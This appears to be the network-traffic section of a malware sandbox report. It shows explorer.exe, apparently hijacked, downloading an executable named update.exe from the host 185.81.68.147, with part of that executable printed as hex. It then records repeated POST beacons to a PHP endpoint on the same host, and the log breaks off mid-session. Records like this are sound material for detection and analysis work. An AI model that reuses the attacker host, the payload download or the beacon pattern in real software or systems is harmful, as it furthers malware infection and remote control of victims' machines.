                                                                                                                                                                                                                                5192.168.2.1049752185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:02.387528896 CET235OUTGET /update.exe HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.713717937 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:03 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                Last-Modified: Sun, 15 Dec 2024 10:31:58 GMT
                                                                                                                                                                                                                                ETag: "4ba00-6294c92dae555"
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Content-Length: 309760
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 eb 5a 12 27 8a 34 41 27 8a 34 41 27 8a 34 41 2e f2 a7 41 24 8a 34 41 27 8a 35 41 2d 8a 34 41 48 fc 9f 41 2d 8a 34 41 48 fc ae 41 26 8a 34 41 48 fc a9 41 26 8a 34 41 52 69 63 68 27 8a 34 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 db af 5e 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 34 00 00 00 00 00 00 14 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$cZ'4A'4A'4A.A$4A'5A-4AHA-4AHA&4AHA&4ARich'4APEd^g":44@@pr((LPX.text8: `.rdata#P$>@@.data@.pdataLb@@.rsrc(f@@.x64PPj
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.713766098 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 89 54
                                                                                                                                                                                                                                Data Ascii: T$HL$HHD$ HD$HD$=MZt3VHD$Hc@<HL$ HHH$HD$ H9$s3/D$(HL$ HH9$v3H$8PEt3H$HHL$H
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.713937044 CET1236INData Raw: 38 48 8d 0d a0 49 00 00 ff 15 6a 3f 00 00 48 8d 15 83 49 00 00 48 8b c8 ff 15 52 3f 00 00 48 89 44 24 20 48 83 7c 24 20 00 74 0b 48 8b 4c 24 40 ff 54 24 20 eb 02 33 c0 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc cc cc 44 89 44 24 18 89 54 24 10 48
                                                                                                                                                                                                                                Data Ascii: 8HIj?HIHR?HD$ H|$ tHL$@T$ 3H8DD$T$HL$HD$3:&?H$H$uH$D$h|$huz$H$H$H$uIH$@=L
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.713998079 CET1236INData Raw: 48 8d 05 35 45 00 00 48 89 05 16 6b 00 00 48 8d 05 57 45 00 00 48 89 05 d0 6a 00 00 48 8d 05 d9 45 00 00 48 89 05 b2 6a 00 00 48 8d 05 6f 46 00 00 48 89 05 9c 6a 00 00 48 8d 05 69 46 00 00 48 89 05 b6 6a 00 00 48 c7 44 24 28 00 00 00 00 48 8d 15
                                                                                                                                                                                                                                Data Ascii: H5EHkHWEHjHEHjHoFHjHiFHjHD$(H^FHgFHjHdFHmFHjHjFHkFHjHdFHiFHjHbFHgFHjHdFHeFHyjH^FH
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.714010000 CET1236INData Raw: 00 e8 ae fa ff ff 48 89 05 43 69 00 00 48 8d 15 c4 47 00 00 48 8d 0d cd 47 00 00 e8 94 fa ff ff 48 89 05 31 69 00 00 48 8d 15 ca 47 00 00 48 8d 0d d3 47 00 00 e8 7a fa ff ff 48 89 05 1f 69 00 00 48 8d 15 d0 47 00 00 48 8d 0d e1 47 00 00 e8 60 fa
                                                                                                                                                                                                                                Data Ascii: HCiHGHGH1iHGHGzHiHGHG`HiHGHGFHhHGHG,HhHGHHHhHHHHHhHHHHHhHHHHH
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.714140892 CET1236INData Raw: 8d 15 76 49 00 00 48 8d 0d 7f 49 00 00 e8 ce f5 ff ff 48 89 05 a3 62 00 00 48 8d 15 7c 49 00 00 48 8d 0d 8d 49 00 00 e8 b4 f5 ff ff 48 89 05 91 62 00 00 48 8d 15 8a 49 00 00 48 8d 0d 9b 49 00 00 e8 9a f5 ff ff 48 89 05 7f 62 00 00 48 8d 15 98 49
                                                                                                                                                                                                                                Data Ascii: vIHIHbH|IHIHbHIHIHbHIHIHmbHIHIfH[bHIHILHIbHIHI2H7bHIHIH%bHIHIHKaHIH
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.714173079 CET1236INData Raw: 89 44 24 48 eb b2 48 8b 84 24 90 00 00 00 8b 4c 24 48 89 08 48 8b 4c 24 38 ff 15 e9 5d 00 00 48 8b 4c 24 50 ff 15 de 5d 00 00 48 8b 44 24 58 48 83 c4 78 c3 44 88 44 24 18 89 54 24 10 48 89 4c 24 08 48 83 ec 28 44 8b 44 24 38 48 8b 54 24 30 48 8d
                                                                                                                                                                                                                                Data Ascii: D$HH$L$HHL$8]HL$P]HD$XHxDD$T$HL$H(DD$8HT$0HYH^H(DD$T$HL$H(DD$8HT$0HiH^H(DD$T$HL$H(DD$8HT$0HyHC^H(
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.714184999 CET1236INData Raw: 50 c7 44 24 20 40 00 00 00 41 b9 00 30 00 00 44 8b c0 48 8b 94 24 10 01 00 00 48 8b 8c 24 20 01 00 00 ff 15 44 5a 00 00 48 89 84 24 60 03 00 00 48 83 bc 24 60 03 00 00 00 75 18 41 b8 00 80 00 00 33 d2 48 8b 4c 24 60 ff 15 76 58 00 00 e9 f2 04 00
                                                                                                                                                                                                                                Data Ascii: PD$ @A0DH$H$ DZH$`H$`uA3HL$`vXH$@THD$ DLD$`H$H$ YuA3HL$`(X$P$P$PH$@9$PHD$pHc@<HL$`HHHc$P
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.714198112 CET776INData Raw: 48 89 84 24 f0 03 00 00 48 8d 94 24 70 03 00 00 48 8b 8c 24 28 01 00 00 ff 15 6a 55 00 00 85 c0 75 15 41 b8 00 80 00 00 33 d2 48 8b 4c 24 60 ff 15 bb 53 00 00 eb 3a 48 8b 8c 24 28 01 00 00 ff 15 3b 55 00 00 85 c0 75 15 41 b8 00 80 00 00 33 d2 48
                                                                                                                                                                                                                                Data Ascii: H$H$pH$(jUuA3HL$`S:H$(;UuA3HL$`SA3HL$`SH_H8H?HD$ LD$ 33-UHD$(H|$(uHL$(UHL$(RBT=uHL$(THL$(RHL$
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.714211941 CET1236INData Raw: 44 8b 0d 8d 53 00 00 4c 8b 05 c2 55 00 00 ba 02 00 00 00 48 8d 0d 96 53 00 00 e8 5d 13 00 00 e8 98 0a 00 00 48 8b 15 95 4f 00 00 48 c7 c1 01 00 00 80 e8 25 0b 00 00 48 8b 15 72 4f 00 00 48 c7 c1 01 00 00 80 e8 12 0b 00 00 48 8d 0d df 3c 00 00 e8
                                                                                                                                                                                                                                Data Ascii: DSLUHS]HOH%HrOHH<H<H=H=H/=H;=HG=HS=Hg=HRHl=#P3H8
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.833950043 CET1236INData Raw: 00 00 e8 39 fe ff ff 0f b6 c0 85 c0 74 54 48 8b 0d bf 4a 00 00 e8 6e 0c 00 00 0f b6 c0 85 c0 75 13 48 8d 0d cc 39 00 00 e8 5b 0c 00 00 0f b6 c0 85 c0 74 08 33 c9 ff 15 20 4c 00 00 e8 ff fc ff ff 33 c0 83 f8 01 74 0d b9 50 c3 00 00 ff 15 b9 4b 00
                                                                                                                                                                                                                                Data Ascii: 9tTHJnuH9[t3 L3tPK3KHD$(D$ E3Lc33}MH$xH$xH$`HD$(D$ E3LF33@MH$XH$XH$hHD$(D$ E3L


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                6192.168.2.1049759185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:05.133683920 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:05.253685951 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:06.748032093 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:05 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                7192.168.2.1049765185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:06.992423058 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:07.112297058 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.594755888 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:07 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                8192.168.2.1049771185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.822622061 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:08.942825079 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.499665022 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:09 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                9192.168.2.1049777185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.726342916 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.846010923 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:12.195861101 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:11 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                10192.168.2.1049783185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:12.429653883 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:12.552704096 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:13.902513981 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:13 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                11192.168.2.1049789185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:14.134696007 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:14.254856110 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:15.576029062 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:14 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                12192.168.2.1049790185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:15.826190948 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:15.945966959 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:17.452081919 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:16 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                13192.168.2.1049796185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:17.679356098 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:17.799346924 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:19.296346903 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:18 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                14192.168.2.1049802185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:19.523907900 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:19.646753073 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:21.162053108 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:20 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                15192.168.2.1049808185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:21.399976015 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:21.519893885 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:22.949085951 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:22 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                16192.168.2.1049814185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:23.179466009 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:23.300108910 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:24.801173925 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:23 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                17192.168.2.1049820185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:25.038700104 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:25.158833981 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:26.689558983 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:25 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                18192.168.2.1049821185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:26.914220095 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:27.034698009 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:28.528179884 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:27 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                19192.168.2.1049827185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:43:28.757741928 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:43:28.877691031 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:43:30.430403948 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:43:29 GMT
